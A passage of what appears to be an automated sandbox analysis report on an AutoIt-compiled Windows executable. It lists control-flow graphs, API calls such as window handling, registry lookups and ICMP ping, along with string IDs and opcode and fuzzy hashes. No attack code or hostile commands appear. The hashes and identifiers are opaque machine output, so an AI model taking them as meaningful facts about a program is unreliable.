141->156 157 df8aa8-df8ab3 call dab4b1 141->157 144->65 187 df87fc-df8805 call dbb5b6 144->187 188 df8719-df8724 call da8577 145->188 146->188 147->148 148->71 149->65 152->65 156->149 157->140 157->163 176 df8b1e-df8b21 163->176 177 df8b1b 163->177 164->67 165->65 190 df879f 167->190 191 df878e-df879d call dac98d 167->191 186 df88e2-df88e9 170->186 171->186 176->19 177->176 199 df86ae-df86b5 179->199 180->199 194 df88eb-df88f0 call da396b 186->194 195 df88f5 call da3907 186->195 210 df8818 187->210 211 df8807-df8816 call dac98d 187->211 188->65 201 df87a3-df87ae call dc9334 190->201 191->201 194->65 209 df88fa 195->209 199->65 201->10 215 df87b4-df87ba 201->215 209->65 214 df881c-df883f 210->214 211->214 217 df884d-df8850 214->217 218 df8841-df8848 214->218 215->65 219 df8852-df885b 217->219 220 df8860-df8863 217->220 218->217 219->220 221 df8865-df886e 220->221 222 df8873-df8876 220->222 221->222 222->65 223 df887c-df888a 222->223 223->65
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 4$@$P$`*$`$d0b$d10m0$d1b$d1r0,2$d5m0$e#$i$t$t$($($($(
                                                                                                                                                                              • API String ID: 0-2951036942
                                                                                                                                                                              • Opcode ID: 2ae4fddb7c1038051c9310f1b2f9e38ad350168450dbe056d371a601388f93b6
                                                                                                                                                                              • Instruction ID: fec51987cb3f948b9ecaa2a4712ee7b9b9728648d281bcf5d4bd8e560ee9b0f4
                                                                                                                                                                              • Opcode Fuzzy Hash: 2ae4fddb7c1038051c9310f1b2f9e38ad350168450dbe056d371a601388f93b6
                                                                                                                                                                              • Instruction Fuzzy Hash: 0E626570508345CFC328DF24C485AAABBE0FF89314F14895EE58A9B351DBB1D949CFA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetInputState.USER32 ref: 00DAEF07
                                                                                                                                                                              • timeGetTime.WINMM ref: 00DAF107
                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DAF228
                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00DAF27B
                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00DAF289
                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DAF29F
                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00DAF2B1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 2189390790-2063206799
                                                                                                                                                                              • Opcode ID: 6c0881520b35a8eed8fb201719d222d93e97928d037ec637877b0959e9cf170f
                                                                                                                                                                              • Instruction ID: 082d15421fad1ce9c07ee2d5c63eb77a76731c301d5b231d5c89439a0b18fa2c
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c0881520b35a8eed8fb201719d222d93e97928d037ec637877b0959e9cf170f
                                                                                                                                                                              • Instruction Fuzzy Hash: 5642F230604305EFD724CB64C844BBABBE5FF82304F19856DE695972A1C771E988CBB6

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 592 da370f-da3724 593 da3726-da3729 592->593 594 da3784-da3786 592->594 596 da378a 593->596 597 da372b-da3732 593->597 594->593 595 da3788 594->595 598 da376f-da3777 DefWindowProcW 595->598 599 de3df4-de3e1c call da2f92 call dbf23c 596->599 600 da3790-da3795 596->600 601 da3738-da373d 597->601 602 da3804-da380c PostQuitMessage 597->602 603 da377d-da3783 598->603 638 de3e21-de3e28 599->638 605 da37bc-da37e3 SetTimer RegisterWindowMessageW 600->605 606 da3797-da379a 600->606 607 da3743-da3747 601->607 608 de3e61-de3e75 call e0c8f7 601->608 604 da37b8-da37ba 602->604 604->603 605->604 612 da37e5-da37f0 CreatePopupMenu 605->612 610 da37a0-da37b3 KillTimer call da3907 call da59ff 606->610 611 de3d95-de3d98 606->611 613 da380e-da3818 call dbfcad 607->613 614 da374d-da3752 607->614 608->604 633 de3e7b 608->633 610->604 618 de3d9a-de3d9e 611->618 619 de3dd0-de3def MoveWindow 611->619 612->604 626 da381d 613->626 621 da3758-da375d 614->621 622 de3e46-de3e4d 614->622 627 de3dbf-de3dcb SetFocus 618->627 628 de3da0-de3da3 618->628 619->604 631 da37f2-da3802 call da381f 621->631 632 da3763-da3769 621->632 622->598 630 de3e53-de3e5c call e01423 622->630 626->604 627->604 628->632 634 de3da9-de3dba call da2f92 628->634 630->598 631->604 632->598 632->638 633->598 634->604 638->598 639 de3e2e-de3e41 call da3907 call da396b 638->639 639->598
                                                                                                                                                                              APIs
                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00DA3709,?,?), ref: 00DA3777
                                                                                                                                                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00DA3709,?,?), ref: 00DA37A3
                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DA37C6
                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00DA3709,?,?), ref: 00DA37D1
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00DA37E5
                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00DA3806
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                              • String ID: 0$$0$$TaskbarCreated
                                                                                                                                                                              • API String ID: 129472671-3836791346
                                                                                                                                                                              • Opcode ID: 12e6c746aa311b62bff559f7a61dffd2d246940506e92f0b5852c3f85ce478af
                                                                                                                                                                              • Instruction ID: 0d0facd14ae0eb4d170250abe987beca0bcb9369e66177ee99385a57e5f6d76f
                                                                                                                                                                              • Opcode Fuzzy Hash: 12e6c746aa311b62bff559f7a61dffd2d246940506e92f0b5852c3f85ce478af
                                                                                                                                                                              • Instruction Fuzzy Hash: 6141E6F1104245BFDB146F3DDC4EB793A67EB46300F08422AF64AA6191DA74DF889771

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00DA3657
                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 00DA3681
                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DA3692
                                                                                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00DA36AF
                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DA36BF
                                                                                                                                                                              • LoadIconW.USER32(000000A9), ref: 00DA36D5
                                                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DA36E4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                                                                                              • Opcode ID: d21ba5829296c4d84ee76eeed04017d92676c60f584733b704e231b55a3e201a
                                                                                                                                                                              • Instruction ID: e5f8ef1dfaab22f251add9ed534193084f12444b5364f67bee33b638de50fcb2
                                                                                                                                                                              • Opcode Fuzzy Hash: d21ba5829296c4d84ee76eeed04017d92676c60f584733b704e231b55a3e201a
                                                                                                                                                                              • Instruction Fuzzy Hash: 0C21EDB1905308AFDB00DFAAEC89A9DBFB4FB08710F00811AF615B62A0D7B54588CF90

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 649 de09db-de0a0b call de07af 652 de0a0d-de0a18 call dcf636 649->652 653 de0a26-de0a32 call dd5594 649->653 658 de0a1a-de0a21 call dcf649 652->658 659 de0a4b-de0a94 call de071a 653->659 660 de0a34-de0a49 call dcf636 call dcf649 653->660 670 de0cfd-de0d03 658->670 668 de0a96-de0a9f 659->668 669 de0b01-de0b0a GetFileType 659->669 660->658 674 de0ad6-de0afc GetLastError call dcf613 668->674 675 de0aa1-de0aa5 668->675 671 de0b0c-de0b3d GetLastError call dcf613 CloseHandle 669->671 672 de0b53-de0b56 669->672 671->658 686 de0b43-de0b4e call dcf649 671->686 677 de0b5f-de0b65 672->677 678 de0b58-de0b5d 672->678 674->658 675->674 679 de0aa7-de0ad4 call de071a 675->679 682 de0b69-de0bb7 call dd54dd 677->682 683 de0b67 677->683 678->682 679->669 679->674 692 de0bb9-de0bc5 call de092b 682->692 693 de0bc7-de0beb call de04cd 682->693 683->682 686->658 692->693 698 de0bef-de0bf9 call dd8a2e 692->698 699 de0bfe-de0c41 693->699 700 de0bed 693->700 698->670 702 de0c62-de0c70 699->702 703 de0c43-de0c47 699->703 700->698 706 de0cfb 702->706 707 de0c76-de0c7a 702->707 703->702 705 de0c49-de0c5d 703->705 705->702 706->670 707->706 708 de0c7c-de0caf CloseHandle call de071a 707->708 711 de0ce3-de0cf7 708->711 712 de0cb1-de0cdd GetLastError call dcf613 call dd56a6 708->712 711->706 712->711
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DE071A: CreateFileW.KERNEL32(00000000,00000000,?,00DE0A84,?,?,00000000,?,00DE0A84,00000000,0000000C), ref: 00DE0737
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DE0AEF
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00DE0AF6
                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00DE0B02
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DE0B0C
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00DE0B15
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DE0B35
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00DE0C7F
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DE0CB1
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00DE0CB8
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                              • String ID: H
                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                              • Opcode ID: 5dd40e85af6857b155b7792a77ae246a5e996809b5e790539810f70d4141a6a1
                                                                                                                                                                              • Instruction ID: d1adf3e100ed33a696f4e307fa42d956af8be624b45af55d1fd7a7f2f9e0757b
                                                                                                                                                                              • Opcode Fuzzy Hash: 5dd40e85af6857b155b7792a77ae246a5e996809b5e790539810f70d4141a6a1
                                                                                                                                                                              • Instruction Fuzzy Hash: 87A12432A042898FDF19EF69D852BAD3FA1EB06324F180159F851EB391C7719C96CB71

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00DE4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00DA55B2
                                                                                                                                                                                • Part of subcall function 00DA5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DA525A
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DA53C4
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DE4BFD
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DE4C3E
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00DE4C80
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DE4CE7
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DE4CF6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                              • API String ID: 98802146-2727554177
                                                                                                                                                                              • Opcode ID: 584ad4c65cb8c1887d4098528d629d7430ee9c83fcef6b537d2e0c768223a1ea
                                                                                                                                                                              • Instruction ID: 57100b62b578f3480130c1695a4161f41a19e325df5dc32f9356f98534415c8f
                                                                                                                                                                              • Opcode Fuzzy Hash: 584ad4c65cb8c1887d4098528d629d7430ee9c83fcef6b537d2e0c768223a1ea
                                                                                                                                                                              • Instruction Fuzzy Hash: 5371BE71404301AEC314EF76EC8599ABBE8FF99340F40442EF459A71A1EB71CA89CB72

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00DA34DE
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00DA34ED
                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 00DA3503
                                                                                                                                                                              • LoadIconW.USER32(000000A4), ref: 00DA3515
                                                                                                                                                                              • LoadIconW.USER32(000000A2), ref: 00DA3527
                                                                                                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DA353F
                                                                                                                                                                              • RegisterClassExW.USER32(?), ref: 00DA3590
                                                                                                                                                                                • Part of subcall function 00DA3624: GetSysColorBrush.USER32(0000000F), ref: 00DA3657
                                                                                                                                                                                • Part of subcall function 00DA3624: RegisterClassExW.USER32(00000030), ref: 00DA3681
                                                                                                                                                                                • Part of subcall function 00DA3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DA3692
                                                                                                                                                                                • Part of subcall function 00DA3624: InitCommonControlsEx.COMCTL32(?), ref: 00DA36AF
                                                                                                                                                                                • Part of subcall function 00DA3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DA36BF
                                                                                                                                                                                • Part of subcall function 00DA3624: LoadIconW.USER32(000000A9), ref: 00DA36D5
                                                                                                                                                                                • Part of subcall function 00DA3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DA36E4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                                                                              • API String ID: 423443420-4155596026
                                                                                                                                                                              • Opcode ID: 7cf7b79a34aebae08bfd2bcaf354a44430101c76973b8a1ba72226c8821574a2
                                                                                                                                                                              • Instruction ID: 73d2568c08f9119987b95beab3ae13151aceea9f5d5fe79c90db4e2faae1dfaa
                                                                                                                                                                              • Opcode Fuzzy Hash: 7cf7b79a34aebae08bfd2bcaf354a44430101c76973b8a1ba72226c8821574a2
                                                                                                                                                                              • Instruction Fuzzy Hash: 80213C70D0031ABFDB10DFA6EC49A997FB4FB08750F04001EF608B62A0C3B905889F90

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 790 e20fb8-e20fef call dae6a0 793 e20ff1-e20ffe call dac98d 790->793 794 e2100f-e21021 WSAStartup 790->794 793->794 805 e21000-e2100b call dac98d 793->805 796 e21023-e21031 794->796 797 e21054-e21091 call dbc1f6 call da8ec0 call dbf9d4 inet_addr gethostbyname 794->797 800 e21033 796->800 801 e21036-e21046 796->801 813 e210a2-e210b0 797->813 814 e21093-e210a0 IcmpCreateFile 797->814 800->801 802 e2104b-e2104f 801->802 803 e21048 801->803 806 e21249-e21251 802->806 803->802 805->794 816 e210b2 813->816 817 e210b5-e210c5 813->817 814->813 815 e210d3-e21100 call dc017b call da423c 814->815 826 e21102-e21129 IcmpSendEcho 815->826 827 e2112b-e21148 IcmpSendEcho 815->827 816->817 819 e210c7 817->819 820 e210ca-e210ce 817->820 819->820 822 e21240-e21244 call dabd98 820->822 822->806 828 e2114c-e2114e 826->828 827->828 829 e21150-e21155 828->829 830 e211ae-e211bc 828->830 833 e2115b-e21160 829->833 834 e211f8-e2120a call dae6a0 829->834 831 e211c1-e211c8 830->831 832 e211be 830->832 835 e211e4-e211ed 831->835 832->831 836 e21162-e21167 833->836 837 e211ca-e211d8 833->837 848 e21210 834->848 849 e2120c-e2120e 834->849 841 e211f2-e211f6 835->841 842 e211ef 835->842 836->830 843 e21169-e2116e 836->843 839 e211da 837->839 840 e211dd 837->840 839->840 840->835 845 e21212-e21229 IcmpCloseHandle WSACleanup 841->845 842->841 846 e21193-e211a1 843->846 847 e21170-e21175 843->847 845->822 852 e2122b-e2123d call dc013d call dc0184 845->852 850 e211a3 846->850 851 e211a6-e211ac 846->851 847->837 853 e21177-e21185 847->853 848->845 849->845 850->851 851->835 852->822 855 e21187 853->855 856 e2118a-e21191 853->856 855->856 856->835
                                                                                                                                                                              APIs
                                                                                                                                                                              • WSAStartup.WS2_32(00000101,?), ref: 00E21019
                                                                                                                                                                              • inet_addr.WSOCK32(?), ref: 00E21079
                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00E21085
                                                                                                                                                                              • IcmpCreateFile.IPHLPAPI ref: 00E21093
                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E21123
                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E21142
                                                                                                                                                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00E21216
                                                                                                                                                                              • WSACleanup.WSOCK32 ref: 00E2121C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                              • String ID: Ping
                                                                                                                                                                              • API String ID: 1028309954-2246546115
                                                                                                                                                                              • Opcode ID: 50a92e27f9bf7956128fe2cc5bf666c91de30b0d9294c5f35af65512bb71dc64
                                                                                                                                                                              • Instruction ID: a2132a75f0bb3735a8847096a5a65e62e8f3211876997ba60d28a616e4658af8
                                                                                                                                                                              • Opcode Fuzzy Hash: 50a92e27f9bf7956128fe2cc5bf666c91de30b0d9294c5f35af65512bb71dc64
                                                                                                                                                                              • Instruction Fuzzy Hash: 2191C031608251DFD720CF25E888F16BBE0FF54318F1885A9F569AB6A2C731EE45CB91
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Variable must be of type 'Object'.$t5$t5$t5$t5$t5
                                                                                                                                                                              • API String ID: 0-3061639177
                                                                                                                                                                              • Opcode ID: e5dc7758af0e269f0a6cdddb2490de1178a38e5c657f7c10fad0c4fad3697bb2
                                                                                                                                                                              • Instruction ID: bcd3cbfdd3bf8b56e650c6777739874c39f20e40a64599aa2af7274efc0ab4e5
                                                                                                                                                                              • Opcode Fuzzy Hash: e5dc7758af0e269f0a6cdddb2490de1178a38e5c657f7c10fad0c4fad3697bb2
                                                                                                                                                                              • Instruction Fuzzy Hash: 9DC25D75A00215DFCB24CFA8C880BAEB7B1FF09310F2981A9E955AB351D775ED41CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00DB15F2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: t5$t5$t5$t5$t5
                                                                                                                                                                              • API String ID: 1385522511-3253990334
                                                                                                                                                                              • Opcode ID: 2f4b3bd4f4a71323c9ff9e18bdfadf59163b84e8484a5fea6cedd72d1eeb041f
                                                                                                                                                                              • Instruction ID: 86873911aeae6a9bf9d437570a61cb71eebd785ed0432dfcf93cb266c20d4e4b
